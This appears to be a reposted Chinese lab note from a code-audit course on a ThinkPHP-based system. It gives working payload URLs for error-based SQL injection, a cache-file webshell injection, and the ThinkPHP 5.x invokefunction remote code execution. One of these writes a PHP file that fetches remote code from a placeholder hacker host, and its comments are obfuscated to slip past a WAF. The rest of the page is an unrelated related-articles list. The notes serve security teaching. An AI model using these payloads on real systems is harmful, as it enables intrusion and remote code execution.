DAY113代码审计-PHPTP框架微P系统漏审项目等

DAY113代码审计-PHPTP框架微P系统漏审项目等

pingmian/2025/4/10 2:29:32/文章来源:https://blog.csdn.net/m0_74402888/article/details/143757066

一、环境安装

导入数据

Debug

版本信息收集

一、不安全写法的sql注入（拼接写法绕过预编译机制）

1、Good.php的不安全写法

2、查找可以参数

3、找路由关系

application/index/controller/Goods.php

http://172.19.1.236:8833/index.php/index/goods/ajaxkdata/pid/6 and(extractvalue(1,concat(0x7e,(select%20user()),0x7e)))%23

application/common.php

二、版本漏洞

1、5.x全版本的sql漏洞

http://172.19.1.236:8833/index.php/index/xiaodi/test?username=) union select updatexml(1,concat(0x7,user(),0x7e),1)%23

产品未找到该用法

2、文件包含

渲染页面值

http://172.19.1.236:8833/index.php/index/xiaodi/include_test?cacheFile=1.html

页面渲染

3、缓存漏洞

http://172.19.1.236:8833/index.php/index/xiaodi/index?username=mochazz123%0d%0a@eval($_GET[_]);//*

4、命令执行

waf对eval进行了拦截

禁止了assert函数对eval函数后面的括号进行了正则过滤

对file\_get\_contents函数后面的括号进行了正则过滤

http://www.0-sec.org/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=2.php&vars[1][1]=<?php /*1111*//***/file_put_contents/*1**/(/***/'index11.php'/**/,file_get_contents(/**/'https://www.hack.com/xxx.js'))/**/;/**/?>

?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

5、xss漏洞

用户名存在xss

6、验证登录token值固定

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/pingmian/61133.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

Flink1.19编译并Standalone模式本地运行

Flink1.19编译并Standalone模式本地运行

1.首先下载源码 2.本地运行新建local_conf和local_lib文件夹，并且将编译后的文件放入对应的目录 2.1 启动前参数配置 2.1.2 StandaloneSessionClusterEntrypoint启动参数修改 2.1.3 TaskManagerRunner启动参数修改和StandaloneSessionClusterEntrypoint一样修改…

阅读更多...

Ascend C算子性能优化实用技巧05——API使用优化

Ascend C算子性能优化实用技巧05——API使用优化

Ascend C是CANN针对算子开发场景推出的编程语言，原生支持C和C标准规范，兼具开发效率和运行性能。使用Ascend C，开发者可以基于昇腾AI硬件，高效的实现自定义的创新算法。目前已经有越来越多的开发者使用Ascend C，我们…

阅读更多...

传奇996_23——杀怪掉落，自动捡取，捡取动画

传奇996_23——杀怪掉落，自动捡取，捡取动画

一、杀怪掉落前置： 添加地图地图刷怪怪物掉落（术语叫爆率，掉落叫爆率，而且文档上叫爆率） 刷怪步骤：在\MirServer\Mir200\Envir\MonItems文件夹中建立以怪物名字为文件名的txt文件写法案例： …

阅读更多...

第二十四章 TCP 客户端服务器通信 - 当前 TCP 设备

第二十四章 TCP 客户端服务器通信 - 当前 TCP 设备

文章目录第二十四章 TCP 客户端服务器通信 - 当前 TCP 设备当前 TCP 设备TCP 设备的 USE 命令第二十四章 TCP 客户端服务器通信 - 当前 TCP 设备当前 TCP 设备可以使用 %SYSTEM.TCPDevice方法返回当前 TCP 设备的 IP 地址和端口号。可以使用 Help() 方法列出这些方法&a…

阅读更多...

计算机编程中的测试驱动开发（TDD）及其在提高代码质量中的应用

计算机编程中的测试驱动开发（TDD）及其在提高代码质量中的应用

💓 博客主页：瑕疵的CSDN主页 📝 Gitee主页：瑕疵的gitee主页 ⏩ 文章专栏：《热点资讯》计算机编程中的测试驱动开发（TDD）及其在提高代码质量中的应用计算机编程中的测试驱动开发（T…

阅读更多...

前后端交互之动态列

前后端交互之动态列

一. 情景在做项目时，有时候后会遇到后端使用了聚合函数，导致生成的对象的属性数量或数量不固定，因此无法建立一个与之对应的对象来向前端传递数据，这时可以采用NameDataListVO向前端传递数据。 Data Builder AllArgsConstructo…

阅读更多...

[笔记]L6599的极限工作条件考量

[笔记]L6599的极限工作条件考量

0.名词 OTP over tempature protect.OCP over current protectOVP over voltage protectBrownout Protection Undervoltage Protection可能需要考虑hysteresis response.因为要考虑一些高频干扰 1.基本的过流保护逻辑参考：ST L6599 器件手册 LLC开关电源&#…

阅读更多...

shell编程规范和脚本变量

shell编程规范和脚本变量

什么是shell 人和计算机内核之间的中介： 计算机的语言是二进制，把人类的语言翻译成计算机能够识别的语言，然后让内核来处理内核完成之后要把结果反馈给用户，要把计算机的翻译成人类能够识别的语言命令解释器，pyc…

阅读更多...

二分查找类型算法

二分查找类型算法

今天开始刷题啦，坚持住哟！ 使用二分法的前提是数组有序且无重复元素。 704.二分查找第一遍代码如下： class Solution {public int search(int[] nums, int target) {int left0;int rightnums.length-1;while(left<right){int mid (r…

阅读更多...

【Pikachu】XML外部实体注入实战

【Pikachu】XML外部实体注入实战

若天下不定，吾往；若世道不平，不回！ 1.XXE漏洞实战首先写入一个合法的xml文档 <?xml version "1.0"?> <!DOCTYPE gfzq [<!ENTITY gfzq "gfzq"> ]> <name>&gfzq;</name&…

阅读更多...

多模块集成swagger（knife4j-spring-boot-starter）

多模块集成swagger（knife4j-spring-boot-starter）

前言单体项目、多模块单体项目、微服务项目，集成的方案大同小异，微服务会在网关做个聚合，后面再补充。依赖版本目前demo的版本如下： spring boot 2.7.3spring cloud 2021.0.4spring cloud alibaba 2021.0.4.0knife4j-sprin…

阅读更多...

uni-app快速入门（七）--组件路由跳转和API路由跳转及参数传递

uni-app快速入门（七）--组件路由跳转和API路由跳转及参数传递

uni-app有两种页面路由跳转模式，即使用navigator组件跳转和调用API跳转，API调转不要理解为调用后台接口的API，而是指脚本函数中使用跳转函数。一、组件路由跳转 1.1 打开新页面打开新页面使用组件的open-type"navigate",见下面…

阅读更多...

DataStream编程模型之数据源、数据转换、数据输出

DataStream编程模型之数据源、数据转换、数据输出

Flink之DataStream数据源、数据转换、数据输出（scala） 0.前言–数据源在进行数据转换之前，需要进行数据读取。数据读取分为4大部分： （1）内置数据源； 又分为文件数据源； socket…

阅读更多...

CSS盒子的定位＞（上篇）#定位属性#相对定位-附练习

CSS盒子的定位＞（上篇）#定位属性#相对定位-附练习

一、定位属性 1.定位方式 position属性可以选择4种不同类型的定位方式。语法格式：position：relation | absolute | fixed参数：①relative生成相对定位的元素，相对于其正常位置进行定位。 ②absolute生成绝对定位的…

阅读更多...

django从入门到精通（六）——auth认证及自定义用户

django从入门到精通（六）——auth认证及自定义用户

Django 提供了一个强大的用户认证系统，允许开发者轻松管理用户的注册、登录、权限和组等功能。以下是对 Django 用户认证系统的详细介绍，包括默认的用户认证、自定义用户认证和权限设置。 1. 默认用户认证 1.1 用户模型 Django 默认提供了一个用户模型…

阅读更多...

Redis/Codis性能瓶颈揭秘：网卡软中断的影响与优化

Redis/Codis性能瓶颈揭秘：网卡软中断的影响与优化

目录现象回顾问题剖析现场分析解决方案总结与反思 1.调整中断亲和性（IRQ Affinity）： 2.RPS（Receive Packet Steering）和 RFS（Receive Flow Steering）： 近期，…

阅读更多...

MySQL 中有哪几种锁？

MySQL 中有哪几种锁？

在 MySQL 中，锁（Locks）是为了保证数据的一致性和完整性而设计的机制。常见的锁可以从粒度和操作类型两个角度分类。以下是详细介绍： 按粒度分类 1. 全局锁描述：锁定整个数据库实例。用途：主要用于备份…

阅读更多...

重置docker版本的octoprint管理员账号密码

重置docker版本的octoprint管理员账号密码

我的情况是octoprint安装在HiNAS系统的机顶盒上，只有一个账号，但是忘记了用户名和密码。有两个选择： 可以试试先找回用户名，然后尝试你的常用密码。直接重置所有账号。 1.找回用户名： 使用使用 docker exec -it <…

阅读更多...

OpenCPN-插件之dashboardsk_pi

OpenCPN-插件之dashboardsk_pi

官网链接地址 DashboardSK Plugin 当前仅仅是编译和运行，后续需要研究代码！其中编译的时候需要下载需要依赖libs，之后就可以交叉编译 corey@fcyswrd-15:~/opencpn/opencpnbuildroot/opencpn_plugins/dashboardsk_pi$ git submodule update --init Submodule opencpn-lib…

阅读更多...

WordPress设置自动更新CSS版本号

WordPress设置自动更新CSS版本号

WordPress 通常会在引用 CSS 文件时添加版本号参数（?verx.x.x）。如果版本号未更新，浏览器可能继续加载旧的文件。解决方法：确保你在 functions.php 文件中正确加载了 CSS 文件，并动态更新版本号。例如在functions.p…

阅读更多...

最新文章